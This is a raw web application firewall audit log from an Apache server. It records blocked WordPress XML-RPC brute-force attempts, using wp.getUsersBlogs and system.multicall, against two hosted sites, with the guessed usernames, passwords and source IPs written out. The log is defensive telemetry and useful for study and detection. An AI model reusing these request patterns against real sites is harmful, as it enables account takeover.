Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c8ca762-Z-- --f710bd4b-A-- [05/Jun/2025:18:28:19 +0700] aEF_U1wdJdhOudw5hdz_EQAAAIg 103.236.140.4 58724 103.236.140.4 8181 --f710bd4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f710bd4b-C-- wp.getUsersBlogs kresno kresno@2001 --f710bd4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f710bd4b-E-- --f710bd4b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (67+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122899282130 6306 (- - -) Stopwatch2: 1749122899282130 6306; combined=4387, p1=530, p2=3682, p3=0, p4=0, p5=104, sr=101, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f710bd4b-Z-- --6b9e7c66-A-- [05/Jun/2025:18:28:55 +0700] aEF_d-th7G2xELALzPZdmgAAAMY 103.236.140.4 58846 103.236.140.4 8181 --6b9e7c66-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.135.71.161 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.135.71.161 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6b9e7c66-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix+++ --6b9e7c66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b9e7c66-E-- --6b9e7c66-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.135.71.161 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749122935124874 4621 (- - -) Stopwatch2: 1749122935124874 4621; combined=3594, p1=385, p2=3050, p3=0, p4=0, p5=93, sr=76, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b9e7c66-Z-- --5d50a866-A-- [05/Jun/2025:18:29:30 +0700] aEF_mirHpfaS2Cuwh8UKxwAAAFg 103.236.140.4 58898 103.236.140.4 8181 --5d50a866-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --5d50a866-C-- wp.getUsersBlogs kresno QWERT --5d50a866-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d50a866-E-- --5d50a866-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122970626104 5265 (- - -) Stopwatch2: 1749122970626104 5265; combined=3793, p1=478, p2=3144, p3=0, p4=0, p5=100, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d50a866-Z-- --6a04b001-A-- [05/Jun/2025:18:30:30 +0700] aEF_1lwdJdhOudw5hdz_TAAAAI8 103.236.140.4 59020 103.236.140.4 8181 --6a04b001-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --6a04b001-C-- wp.getUsersBlogs kresno manager --6a04b001-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a04b001-E-- --6a04b001-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123030258280 4737 (- - -) Stopwatch2: 1749123030258280 4737; combined=3473, p1=360, p2=2919, p3=0, p4=0, p5=110, sr=82, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a04b001-Z-- --7093cb37-A-- [05/Jun/2025:18:31:15 +0700] aEGAA1wdJdhOudw5hdz_XgAAAJE 103.236.140.4 59134 103.236.140.4 8181 --7093cb37-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 139.59.17.212 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7093cb37-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehManager123! --7093cb37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7093cb37-E-- --7093cb37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 139.59.17.212 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749123075267458 4973 (- - -) Stopwatch2: 1749123075267458 4973; combined=3717, p1=384, p2=3109, p3=0, p4=0, p5=135, sr=79, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7093cb37-Z-- --d2b65d37-A-- [05/Jun/2025:18:31:30 +0700] aEGAEirHpfaS2Cuwh8ULBwAAAEI 103.236.140.4 59170 103.236.140.4 8181 --d2b65d37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d2b65d37-C-- wp.getUsersBlogs kresno p@ssword --d2b65d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2b65d37-E-- --d2b65d37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123090402282 4800 (- - -) Stopwatch2: 1749123090402282 4800; combined=3486, p1=408, p2=2906, p3=0, p4=0, p5=101, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2b65d37-Z-- --86881c73-A-- [05/Jun/2025:18:32:30 +0700] aEGATn-K7ToMdu-YSIJXewAAAAw 103.236.140.4 59348 103.236.140.4 8181 --86881c73-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --86881c73-C-- wp.getUsersBlogs kresno aaaa --86881c73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86881c73-E-- --86881c73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (81+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123150604631 4077 (- - -) Stopwatch2: 1749123150604631 4077; combined=3118, p1=339, p2=2613, p3=0, p4=0, p5=97, sr=77, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86881c73-Z-- --52dfe009-A-- [05/Jun/2025:18:33:30 +0700] aEGAiirHpfaS2Cuwh8ULKQAAAEE 103.236.140.4 59426 103.236.140.4 8181 --52dfe009-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --52dfe009-C-- wp.getUsersBlogs kresno foobar --52dfe009-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52dfe009-E-- --52dfe009-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123210588070 5039 (- - -) Stopwatch2: 1749123210588070 5039; combined=3698, p1=461, p2=3063, p3=0, p4=0, p5=101, sr=91, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52dfe009-Z-- --3e03f92a-A-- [05/Jun/2025:18:34:30 +0700] aEGAxuth7G2xELALzPZdugAAAMw 103.236.140.4 59578 103.236.140.4 8181 --3e03f92a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --3e03f92a-C-- wp.getUsersBlogs kresno 123111 --3e03f92a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e03f92a-E-- --3e03f92a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123270185754 8795 (- - -) Stopwatch2: 1749123270185754 8795; combined=4460, p1=941, p2=3335, p3=0, p4=0, p5=106, sr=94, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e03f92a-Z-- --f6686f29-A-- [05/Jun/2025:18:34:32 +0700] aEGAyOth7G2xELALzPZdvgAAANY 103.236.140.4 59588 103.236.140.4 8181 --f6686f29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f6686f29-C-- wp.getUsersBlogs kresno 1234%^&* --f6686f29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6686f29-E-- --f6686f29-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123272218537 5694 (- - -) Stopwatch2: 1749123272218537 5694; combined=3833, p1=471, p2=3153, p3=0, p4=0, p5=121, sr=105, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6686f29-Z-- --32ba7c6f-A-- [05/Jun/2025:18:35:10 +0700] aEGA7uth7G2xELALzPZd3AAAAMg 103.236.140.4 59656 103.236.140.4 8181 --32ba7c6f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 159.89.224.46 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 159.89.224.46 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --32ba7c6f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin& --32ba7c6f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --32ba7c6f-E-- --32ba7c6f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1749123310027404 6232 (- - -) Stopwatch2: 1749123310027404 6232; combined=4581, p1=479, p2=3780, p3=30, p4=34, p5=146, sr=94, sw=112, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32ba7c6f-Z-- --1adc443f-A-- [05/Jun/2025:18:35:19 +0700] aEGA9-th7G2xELALzPZd5AAAANU 103.236.140.4 59680 103.236.140.4 8181 --1adc443f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.135.71.161 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.135.71.161 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1adc443f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix1998 --1adc443f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1adc443f-E-- --1adc443f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.135.71.161 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749123319157733 4543 (- - -) Stopwatch2: 1749123319157733 4543; combined=3541, p1=358, p2=3004, p3=0, p4=0, p5=105, sr=80, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1adc443f-Z-- --d6677150-A-- [05/Jun/2025:18:35:30 +0700] aEGBAlwdJdhOudw5hdz_ngAAAIw 103.236.140.4 59724 103.236.140.4 8181 --d6677150-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d6677150-C-- wp.getUsersBlogs kresno summer --d6677150-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6677150-E-- --d6677150-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123330161526 4690 (- - -) Stopwatch2: 1749123330161526 4690; combined=3503, p1=361, p2=2948, p3=0, p4=0, p5=111, sr=81, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6677150-Z-- --1a85812c-A-- [05/Jun/2025:18:36:30 +0700] aEGBPn-K7ToMdu-YSIJXzAAAABA 103.236.140.4 59870 103.236.140.4 8181 --1a85812c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --1a85812c-C-- wp.getUsersBlogs kresno matthew --1a85812c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a85812c-E-- --1a85812c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123390399351 3795 (- - -) Stopwatch2: 1749123390399351 3795; combined=2939, p1=296, p2=2498, p3=0, p4=0, p5=84, sr=69, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a85812c-Z-- --db38e060-A-- [05/Jun/2025:18:37:30 +0700] aEGBeuth7G2xELALzPZeQQAAANU 103.236.140.4 60058 103.236.140.4 8181 --db38e060-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --db38e060-C-- wp.getUsersBlogs kresno qwer123456 --db38e060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db38e060-E-- --db38e060-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123450201469 4287 (- - -) Stopwatch2: 1749123450201469 4287; combined=3241, p1=348, p2=2727, p3=0, p4=0, p5=97, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db38e060-Z-- --2ab2da6f-A-- [05/Jun/2025:18:38:37 +0700] aEGBvX-K7ToMdu-YSIJX0gAAAAI 103.236.140.4 60204 103.236.140.4 8181 --2ab2da6f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --2ab2da6f-C-- wp.getUsersBlogs kresno superman1 --2ab2da6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ab2da6f-E-- --2ab2da6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (62+1 hits since last 